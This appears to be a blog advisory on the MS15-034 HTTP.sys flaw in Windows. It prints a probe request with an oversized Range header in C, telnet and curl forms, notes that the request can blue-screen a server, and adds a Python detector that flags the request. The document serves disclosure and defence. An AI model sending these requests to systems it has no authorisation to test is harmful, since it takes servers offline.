A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.
Update: exploit code is emerging
The first snippets of exploit code for MS15-034 are starting to show up; they scan a system for the vulnerability.
char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
This remote scan uses the Range header to trigger a buffer overflow and detect whether the system is vulnerable.
$ telnet 10.0.1.1 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615
The following curl command would mimic the same request.
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
The Range attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (Dutch (NL) blog post with more details).
When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.
The CVE and Microsoft Bulletin mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.
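A defender-side check for the request shown above, as an added example that is not part of the original post: it reads the Range header of a raw HTTP request and flags byte-range bounds equal to 18446744073709551615 or otherwise implausibly large, which generalizes beyond the single value in the post. The function names and the 2**63 threshold are assumptions made for this example.

```python
import re

UINT64_MAX = 2**64 - 1        # 18446744073709551615, the bound used in the probe
SUSPICIOUS_BOUND = 2**63      # assumption: no real file is anywhere near this size
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def range_header(raw_request: bytes):
    """Return the Range header value of a raw HTTP request, or None."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:            # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "range":  # header names are case-insensitive
            return value.strip()
    return None

def classify(raw_request: bytes) -> str:
    """Return 'probe' (bound == 2**64-1), 'suspicious' (huge bound) or 'clean'."""
    value = range_header(raw_request)
    if value is None:
        return "clean"
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return "clean"
    verdict = "clean"
    for spec in specs.split(","):                  # a header may carry several ranges
        m = RANGE_SPEC.match(spec)
        if not m:
            continue
        for bound in filter(None, m.groups()):     # open-ended ranges leave one side empty
            digits = bound.lstrip("0") or "0"
            if len(digits) > 20:                   # longer than any 64-bit value
                verdict = "suspicious"
                continue
            n = int(digits)
            if n == UINT64_MAX:
                return "probe"
            if n >= SUSPICIOUS_BOUND:
                verdict = "suspicious"
    return verdict

if __name__ == "__main__":
    # Constructed sample requests: the probe from the post and a normal range request
    samples = [
        b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
        b"GET /file.zip HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-499\r\n\r\n",
    ]
    for req in samples:
        print(classify(req), range_header(req))
```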
You can also check your sites right here: https://lab.xpaw.me/MS15-034/